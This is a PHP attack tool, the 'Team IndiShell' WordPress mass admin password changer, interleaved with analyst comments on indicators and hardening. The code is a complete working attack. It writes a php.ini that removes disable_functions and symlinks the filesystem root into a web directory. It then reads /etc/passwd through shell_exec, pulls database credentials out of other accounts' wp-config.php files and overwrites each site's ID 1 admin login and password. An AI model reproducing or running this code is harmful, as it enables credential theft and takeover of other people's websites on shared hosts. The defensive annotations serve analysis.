	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>'; ?>
<html>
	<head>
		<?php 
		echo $head ;
		echo '
<div align=center><font color=white font size=4><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="3" width="50%"><span class="footerlink">Special f**k goes to my best buddy  "Suriya CyberTyson" <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif></span></marquee><br></font></div>
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >

			

       <td width="100%" align=center valign="top" rowspan="1">
           <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Code Breaker ICA ]]==--</font><font color=white size=5 face="comic sans ms"><b><br> <font color=#ff9933 size=5 face="comic sans ms">--==[[ <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> w0rdpress  mass  </font><font color=white size=5 face="comic sans ms">admin panel username/pasword </font><font color=green size=5 face="comic sans ms"><b>changer By Team  IndiShell <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> ]]==--</font> <div class="hedr"> 

        <td height="10" align="left" class="td1"></td></tr><tr><td 
        width="100%" align="center" valign="top" rowspan="1"><font 
        color="red" face="comic sans ms"size="1"><b> 
        <font color=#ff9933> 
        ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br>   Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Striker india,cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>

<font color=white>--==[[Dedicated to]]==--</font>
<br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Deepika Kaushik</font><br><font color=#ff9933> 
        ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
						
           </table>
        
</table>
'; 
?>
 <body bgcolor=black><h3 style="text-align:center">
 <form method=post><font color=white size=3 face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
<input type=submit name=ini value="use to Generate PHP.ini" /></form>

<?php
	// Analyst note: the POST field "ini" makes the script write a php.ini containing
	// "disable_functions=none" into its own directory (relative path). Presumably this is
	// meant to override a hoster's disable_functions setting on servers that read a php.ini
	// from the script's directory (confirm against the SAPI in use). An unexpected php.ini
	// in a web-writable directory is an indicator worth alerting on.
	if(isset($_POST['ini']))
	{
		
		// Opened for writing with a relative path; the handle is never closed explicitly.
		$r=fopen('php.ini','w');
		$rr=" disable_functions=none ";
		fwrite($r,$rr);
		// Link shown to the operator so the generated file can be requested in the browser.
		$link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
		echo $link;
		echo "<br>";
		}
	
	
	
	?>
 <div align=center><table width=60%><tr><td align=center><a href="<?php echo '?whole'; ?>"><font color=white size=3 face="comic sans ms">change user/pass for whole server</font></a></td><td align=center><a href="<?php echo '?particular'?>"><font color=white size=3 face="comic sans ms">change user/pass for particualr users</a></font></td></tr></table><br>
 
<?php
// Analyst note: the query parameter "whole" only renders the operator form for the
// server-wide mode; the form posts uname, pass and start back to this script.
// The pre-filled values ("Team" / "INDISHELL") are useful pivots when checking
// WordPress user tables for overwritten admin accounts.
if(isset($_GET['whole']))
{
echo "<font color=white size=3 face=\"comic sans ms\">bhai ji , please fill the username/password that you want to set on admin panels :)<br><form method=post><font color=white size=3 face=\"comic sans ms\">";
echo "username:<input type=text name=uname value=Team><br>";
echo "Password<input type=text name=pass value=INDISHELL></font><br>";
echo "<input type=submit name=start value=\"start 8-)\"><p>";

}
?>
<?php
// Turns off PHP error reporting from this point on, so failures in the code below
// produce no visible warnings or notices.
error_reporting(0);
/**
 * Returns the trimmed text found between two marker strings.
 *
 * Takes the segment that follows the first occurrence of $marqueurDebutLien in
 * $text and returns the part of that segment that precedes the first occurrence
 * of $marqueurFinLien. The script calls it on fetched wp-config.php text to read
 * the database user, password, name and table prefix.
 *
 * @param string $text              Text to search.
 * @param string $marqueurDebutLien Start marker.
 * @param string $marqueurFinLien   End marker.
 * @return string Trimmed text between the markers.
 */
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{

// Index 1 is the piece right after the first start marker; it is read without checking that it exists.
$ar0=explode($marqueurDebutLien, $text);
// Index 0 is everything in that piece up to the first end marker.
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}


// Handler for the "whole server" form (POST field `start`).
// Analyst summary of what the visible code does:
//   1. creates ./Indishell with a .htaccess that maps .php to text/plain, plus
//      a symlink Indishell/root pointing at /;
//   2. lists local account names from /etc/passwd through shell_exec;
//   3. fetches each account's WordPress config over HTTP through the symlink;
//   4. connects to MySQL on localhost with the credentials found there and
//      overwrites user_login and user_pass of the row with ID = 1.
// Host indicators: an `Indishell` directory next to the script, a symlink named
// `root` resolving to `/`, a .htaccess containing `AddType text/plain .php`,
// and access-log requests under `/Indishell/root/home/`.
// Hardening that breaks this chain: do not let tenants enable unrestricted
// symlink following from .htaccess (e.g. Apache `Options SymLinksIfOwnerMatch`
// with `AllowOverride` not permitting `Options`), keep wp-config.php unreadable
// to other accounts, and isolate sites per user.
// Response: for every site listed in the output, reset the ID 1 account and
// rotate the database credentials, since the config contents were read.
if(isset($_POST['start']))
{

// Replacement login and password come straight from the request.
$uname=$_POST['uname'];
$pass=$_POST['pass'];


////////////////////////////////////////////////////////
/////////////////// symlink ///////////////////
////////////////////////////////////////////////////////

// World-writable working directory; the .htaccess written into it asks the web
// server to serve .php files as plain text instead of executing them.
mkdir('Indishell',0777);
$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Indishell/.htaccess','w');
fwrite($g,$rr);
// Symlink to the filesystem root; the is_dir() test below checks that it resolves.
symlink("/","Indishell/root");
if(!is_dir('Indishell/root'))
{
echo "sorry bhai ji , script could not symlink / folder :( ";
}
else
{
// Selects /etc/passwd entries with UID > 500, excluding 65534 and 1000, and
// keeps only the account-name field.
$cmd="awk -F : '($3>500) && ($3!=65534) && ($3!=1000)' /etc/passwd | cut -f 1 -d ':' ";
$c=shell_exec($cmd);
$usr=explode("\n",$c);
foreach($usr as $us )
{

$u=trim($us);

// Requests go back to this same virtual host, through the symlinked path.
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/Indishell/root/home/';
// Candidate files, relative to each account's public_html.
$confi=array("wp-config.php","blog/wp-config.php","wordpress/wp-login.php");
foreach($confi as $co)
{
$uurl=@file_get_contents($base_url.$u."/public_html/".$co);

// Continue only when the fetched body mentions DB_NAME (case-insensitive).
if($uurl && preg_match('/DB_NAME/i',$uurl))
{

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user $u </font></td></tr></table>";
$wl=$base_url.$u."/public_html/".$co;
$text=file_get_contents($wl);

$uname=$_POST['uname'];
// Database user, password, name and table prefix extracted from the config text.
$dbu=entre2v2($text,"define('DB_USER', '","');");
$dbp=entre2v2($text,"define('DB_PASSWORD', '","');");
$dbn=entre2v2($text,"define('DB_NAME', '","');");
$tp=entre2v2($text,"$table_prefix = '","'");

// Unsalted MD5 of the supplied password.
// NOTE(review): WordPress accepts legacy MD5 values in user_pass, so a bare
// 32-hex-character user_pass on ID 1 is worth hunting for — confirm per version.
$npwd= md5($pass);
$host="localhost";
// Legacy mysql_* API (removed in PHP 7.0); errors are silenced with @.
$dbconnect=@ mysql_connect($host,$dbu,$dbp);
$dbselect=@ mysql_select_db($dbn,$dbconnect);
if($dbselect)
{
echo "<font color=red>database $dbn has been selected<br>";

// Two UPDATEs against `<prefix>users`, row ID = 1; request values are
// concatenated into the SQL. $ru ends up holding only the second result.
$ru=@ mysql_query("UPDATE `".$tp."users` SET `user_login` ='".$uname."' WHERE ID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `user_pass` ='".$npwd."' WHERE ID = 1") ;
// Reads the `home` option and prints the site's URL.
$req =mysql_query("SELECT * from `".$tp."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
echo "website is ".$data["option_value"];
if(!$ru)
{
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
}
else {

// The response echoes the new username and the plaintext password.
echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
}

}
}
}
}
}


}
?> 
<?php

// Renders the "particular users" form when the query string contains
// `particular`. The form posts `uname` (prefilled "Team"), `pass` (prefilled
// "INDISHELL"), a textarea `wen` holding one account name per line, and the
// submit field `cant`.
// Log hunting: a GET with `?particular` followed by a POST carrying `cant=`
// and `wen=` to the same path matches this sample's request pattern.
if(isset($_GET['particular']))
{

?>
<font size=3 color=white face="comic sans ms">Put the wordpress website usernames for mass user/password change<br></font>
<form method=post>
<font size=3 color=white face="comic sans ms"> username:<input type=text name=uname value=Team><br>
Password<input type=text name=pass value=INDISHELL></font><br>
<font color=red size=3 face="comic sans ms">user list<br><textarea rows=6 cols=45 name=wen></textarea>
<br><br><input type=submit name=cant value="bhaiyu.... click me and i will try to hex this shit XD" /></form><p>
<?php
}
?>
<?php
// Handler for the "particular users" form (POST field `cant`).
// Analyst summary of what the visible code does:
//   1. creates ./Indishell with a .htaccess that maps .php to text/plain, plus
//      a symlink Indishell/root pointing at /;
//   2. takes the account names from the `wen` textarea, one per line;
//   3. fetches each account's WordPress config over HTTP through the symlink;
//   4. connects to MySQL on localhost with the credentials found there and
//      overwrites user_login and user_pass of the row with ID = 1.
// Unlike the `start` handler, nothing here checks that the symlink resolved,
// and the account list comes from the request rather than from /etc/passwd.
// Host indicators: an `Indishell` directory next to the script, a symlink named
// `root` resolving to `/`, a .htaccess containing `AddType text/plain .php`,
// and access-log requests under `/Indishell/root/home/`.
// Hardening that breaks this chain: do not let tenants enable unrestricted
// symlink following from .htaccess (e.g. Apache `Options SymLinksIfOwnerMatch`
// with `AllowOverride` not permitting `Options`), keep wp-config.php unreadable
// to other accounts, and isolate sites per user.
// Response: for every site listed in the output, reset the ID 1 account and
// rotate the database credentials, since the config contents were read.
if(isset($_POST['cant']))
{

// Switches off PHP error reporting for the rest of the request.
error_reporting(0);
// Replacement login and password come straight from the request.
$uname=$_POST['uname'];
$pass=$_POST['pass'];

// Newline-separated account names supplied by the operator.
$users=$_POST['wen'];

// World-writable working directory; the .htaccess written into it asks the web
// server to serve .php files as plain text instead of executing them.
mkdir('Indishell',0777);
$rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Indishell/.htaccess','w');
fwrite($g,$rr);
// Symlink to the filesystem root.
symlink("/","Indishell/root");
$use=explode("\n",$users);



foreach($use as $us){
$u=trim($us);
echo "<font color=red size=3 face=\"comic sans ms\">".$u;
// Requests go back to this same virtual host, through the symlinked path.
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/Indishell/root/home/';
// Candidate files, relative to each account's public_html.
$confi=array("wp-config.php","blog/wp-config.php","wordpress/wp-login.php");
foreach($confi as $co)
{
$uurl=@file_get_contents($base_url.$u."/public_html/".$co);

// Continue only when the fetched body mentions DB_NAME (case-insensitive).
if($uurl && preg_match('/DB_NAME/i',$uurl))
{

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user $u </font></td></tr></table>";
$wl=$base_url.$u."/public_html/".$co;
$text=file_get_contents($wl);

$uname=$_POST['uname'];
// Database user, password, name and table prefix extracted from the config text.
$dbu=entre2v2($text,"define('DB_USER', '","');");
$dbp=entre2v2($text,"define('DB_PASSWORD', '","');");
$dbn=entre2v2($text,"define('DB_NAME', '","');");
$tp=entre2v2($text,"$table_prefix = '","'");

// Unsalted MD5 of the supplied password.
// NOTE(review): WordPress accepts legacy MD5 values in user_pass, so a bare
// 32-hex-character user_pass on ID 1 is worth hunting for — confirm per version.
$npwd= md5($pass);
$host="localhost";
// Legacy mysql_* API (removed in PHP 7.0); errors are silenced with @.
$dbconnect=@ mysql_connect($host,$dbu,$dbp);
$dbselect=@ mysql_select_db($dbn,$dbconnect);
if($dbselect)
{
echo "<font color=red>database $dbn has been selected<br>";

// Two UPDATEs against `<prefix>users`, row ID = 1; request values are
// concatenated into the SQL. $ru ends up holding only the second result.
$ru=@ mysql_query("UPDATE `".$tp."users` SET `user_login` ='".$uname."' WHERE ID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `user_pass` ='".$npwd."' WHERE ID = 1") ;
// Reads the `home` option and prints the site's URL.
$req =mysql_query("SELECT * from `".$tp."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
echo "website is ".$data["option_value"];
if(!$ru)
{
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
}
else {

// The response echoes the new username and the plaintext password.
echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
}

}
}

}
}


}
?>